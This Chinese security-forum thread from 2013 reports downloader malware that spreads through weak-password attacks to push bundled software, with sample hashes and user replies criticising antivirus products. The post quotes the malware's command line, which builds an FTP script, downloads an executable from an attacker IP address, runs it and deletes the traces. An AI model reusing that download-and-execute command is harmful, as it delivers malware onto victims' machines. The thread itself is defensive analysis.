精睿(vc52).网络安全

 找回密码
 注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 2498|回复: 24

[分享] 金山病毒推广还没停?新发现的下载者病毒样本

  [复制链接]
发表于 2013-5-10 11:21 | 显示全部楼层 |阅读模式
  还是用的弱密码漏洞,和“黑鹰”病毒的手法差不多(具体可见之前的帖子:http://bbs.vc52.cn/thread-457398-1-1.html)。

  这次推广的软件包括金山卫士、金山毒霸、猎豹浏览器、无极影音、百度浏览器、PPTV等等十几款,这已经是最近一个多月以来的第5次了。从日志上看,在凌晨0点到1点这段时间黑客开始攻击,每小时大概能有10-20次攻击。

  并且,金山毒霸对这两个样本都不拦截。。。

  样本MD5:
  4EBE7AE4E14D68AE1019E48016A1C0EF
  019A1305C5F7E8A814092DC8D8C2B6C4

  用作分析的样本MD5:019A1305C5F7E8A814092DC8D8C2B6C4

  /c @echoopen 198.100.120.148>>log.dat&@echo123>>log.dat&@echo 123>>log.dat&@echo bin>>log.dat&@echo get QQ2013.exe>>log.dat&@echo bye>>log.dat&@ftp -s:log.dat&dellog.dat&QQ2013&QQ2013.exe&QQ2013.exe

  1、黑客的ftp:

  2、木马是个百度网盘转换器。

  3、因为和黑鹰类似,中间过程不再详述了,感兴趣的可以自己去查一下http://bbs.vc52.cn/thread-457398-1-1.html
  4、下载者木马在安装程序,有十几款

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
发表于 2013-5-10 11:30 | 显示全部楼层
金山应该管理一下他们的推广下线了....  到处都是推广金山的恶意软件.....
回复 支持 反对

使用道具 举报

发表于 2013-5-10 11:41 | 显示全部楼层
进来看一看
回复 支持 反对

使用道具 举报

发表于 2013-5-10 11:48 | 显示全部楼层
来凑个热闹!
回复 支持 反对

使用道具 举报

发表于 2013-5-10 11:56 | 显示全部楼层
其推广-----可以说是xx
回复 支持 反对

使用道具 举报

发表于 2013-5-10 13:10 | 显示全部楼层
看看
回复 支持 反对

使用道具 举报

发表于 2013-5-10 14:59 | 显示全部楼层
我只能说,你相信国产杀毒能真的起作用,那你的电脑得病是必然。吓唬吓唬小孩子还是可以的。

点评

不过对AVAST,AVG什么的,360的实力还是显得绰绰有余的,不过对比特梵德卡巴斯基,就不一定了  详情 回复 发表于 2013-8-19 11:52
回复 支持 反对

使用道具 举报

发表于 2013-5-13 15:28 | 显示全部楼层
謝謝大大分享~感恩!
回复 支持 反对

使用道具 举报

发表于 2013-5-15 13:49 | 显示全部楼层
终于看完了~~~












转载自8cdkey.com/
回复 支持 反对

使用道具 举报

发表于 2013-5-15 18:09 | 显示全部楼层
各有所长,看你用的怎么样了
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|文字版|RSS|站长邮件|精睿.网络安全 ( 鄂ICP备07005250号 )

GMT+8, 2017-9-21 11:17 , Processed in 0.130740 second(s), 30 queries , Gzip On.

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表